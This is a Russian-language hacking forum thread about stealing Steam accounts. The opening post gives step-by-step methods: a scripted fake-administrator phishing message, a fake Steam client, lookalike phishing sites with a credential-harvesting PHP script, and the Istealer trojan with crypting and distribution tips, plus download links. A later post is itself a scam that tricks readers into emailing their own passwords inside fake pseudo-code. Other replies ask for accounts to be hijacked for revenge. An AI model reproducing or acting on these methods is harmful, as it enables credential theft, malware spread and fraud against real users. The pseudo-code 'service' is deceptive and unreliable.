Hack Forum For Counter-Strike 1.6

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Hack Forum For Counter-Strike 1.6 » Статьи » Взлом Аккаунтов (Steam)


Взлом Аккаунтов (Steam)

Сообщений 1 страница 8 из 8

1

В этой статье я буду расматривать способы которыми я взламывал аккаунты.

1.Соц инженерия.

Регистрируем штук 25 steam аккаунтов и добавляем всех подрят в друзья.
Далее в действие вступает наш подвязной язык.Тут я рассмотрю самый простой текст
"Здраствуйте,это администарция!Мы подозреваем что на вашем компьютере использовались читы.Просьбы выслать нам
ваш логин и пароль,чтобы всё уладить.Проверка аккаунты займёт 5 минут.Если вы не дадите аккаунт на проверку
то ваш VAC будет забанен."Так же некоторые нюансы при данном взломе,этот способ плохо годиться для комерческих целей,так как уже мало кто ведёться.Так же советую поставить себе в аватарку Steam и сделать ник что-то в роде
этого "Admin-34".

2.Фейковый клиент и сайт.

1)Фейковый клиент,для этого нам понядобяться сорцы на delphi (которые предоставил нам black spoonge :D,щас в блэке,автор сорцев Sin3v)Так сделали фейк, действуем по такой же схеме добавляем в друзья по 100 человек на разные аккаунты.Пишем сообщения типа
"Привет,я тут побробавал новый стим клиент,такой реальный на качай wwwru.com"Далее когда мы ломанули 2-3 аккаунта.Не спешите удалять
друзей,так как их тоже надо спамить,будут вестись многие!Данный способ тоже более эффективен чем перво приведённый.

2)Фейковый САЙТ,для этого нам понадобяться вложения где то 7$,чтобы был выхлоп из данного способа надо создать около 5 таких сайтов.
Топаем регаем домен чтобы был маскимально приблежённым к слову steam,например steam-get.ru Далее привязываем сайт к самому дешёвому хостингу
т.к данные сайты обычно живут около недели.Создаём морду сайта,если есть навыки в фотошопе и в хтмл то сделайте что то типа проголосуй и получи в подарок
игру в Steam,для входа поставьте простенький скрипт на пхп,который будет кидать заходы на мыло или на гейт.
Спамьте всё и вся,тут опять всё зависит от вашего подвязного языка.

3.Троян для кражи паролей от стима и от других програм.

Istealer v3 в настройке очень прост,отчёты отправлят на фтп.Трой легко поддаёться криптовки.
Не будем расматривать настройку данного троя(очень просто),могу посоветовать бесплатный и хороший хостинг для троя - kilu.de
Ну мы настроили и криптанули,палиться всем и вся так что лучше криптануть.
Теперь вопрос где и как рассылать есть много способов,я рассмотрю два способа.

1)Созадаём группу и сайт к группе,рассылаем приглошения всем и вся.Вот уже через месяц у нас накопилось в
группе 2000 человек.Далее постим на сайте новость типа "вот вышел уникальный кряк для стима" и стартуем событие типа "качайте не пожалеете"
..Плюс данного способа это то что он очень эффективен,в первый день с троя я снял около 50 аккаунтов,далее в течении месяца в день получал по 2-4 аккаунта.
Минус данного способа,если вам срочно нужны деньги то вам это не подходит.Идём дальше..

2)Регистируем акков 5 и добавляем всех подряд в друзья.Потом пишем каждому типа

Далее заходим на акк и спамим по друзьям..

Думаю всё понятно и доходчиво рассказал,дерзайте!:D
(Сильно не пинать,статья рассчитана для новичков)

Исользованая софтина
Сорцы фейка для Steam - _http://www.sendspace.com/file/edov4x
Istealer v3 - _http://www.sendspace.com/file/ewkcbe

Данная статья написана в ознакомительных целях и в целях безопасности!
Показывает как нельзя делать!
Я не несу никакой ответственности за возможный ущерб, нанесённый этой статьёй.
Ydachi Zelat' ne Bydy - Plohaya primeta.

(c)erolom Icq 298-318 для forum.zloy.bz

0

2

Теперь буду остерегаться:)

0

3

Как заполучить логин и пароль steam человека зная его ник например?Есть множество сервисов о которых не знают люди,этими сервисами пользуются администрация больших рунетов... эти самые сервисы - предоставляют вам полную информацию о определенном направлении...будь это почта,steam,лицензии и т.д. В пример я привожу один из них - steamcommunity.com@mail.ru далее просто следуйте инструкциям ниже и все получится!
1. Заходим в почту и отправляем письмо на этот сервис: steam-community.com@mail.ru
2. В графу "тема" вставте это "Info-Steam account: Password & Login"
3. Вставляете в письмо это:
{failpass}
/Go to page 1
{trubl theme = password forgot = fail}
/derictory count/
{/fors to server:х100
{my sql}: dsda/ а здесь пишем ник того кого хотите "взломать"{1for ressurce go to"2"}
/02870163
[my 2 last pass: здесь пишем свой логин который вписываешь при входе в с steam
[/forward2folder 00123691]
{my count pass}: ваш пароль который вписываешь при входе в steam (Нужно в проверки что вы не бот)
//target trash_1
/trash_2
{go to mile page}:ваш e-mail (почта)
//endcript_1 /
{go to mile password}: ваш пароль e-mail(почта)
4. Логин и пароль приходит в течении 24 часов.

0

4

Мишка, спсибо тебе большое, мне на меил пришел аккаунт, в аккаунте 15 игр, ждк новые аккаунты. Удачи всем кто поробует. Посаветую я этот способ друзьям=).

0

5

1000 рублей на мобильник, КОНКУРС

0

6

Привет всем! помогите взломать стим одного человека за вознаграждение .Он меня наебал на деньги вот мой скайп:maxsimka143

0

7

Привет всем!
У меня есть к вам ребята одна просьба, надо срочно взломать один акаунт, дам вам ссылку на этот акаунт.
Взломайте пожалуйста его так чтобы он не смог никогда вернуть обратно его!
И делайте  с ним что угодно, хоть продайте его!
Главное чтобы он не смог вернут обратно свой акаунт!
Ссылка акаунта этого чело... : http://steamcommunity.com/id/NatureVeritas
СПАСИБО!!!

0

8

Мишка
А ник какой писать? Ну, я имею ввиду, логин который просит при входе в стим или Имя в стиме? Например: DRINK VODKA PLAY DOTKA, Rap1ra.

0


Вы здесь » Hack Forum For Counter-Strike 1.6 » Статьи » Взлом Аккаунтов (Steam)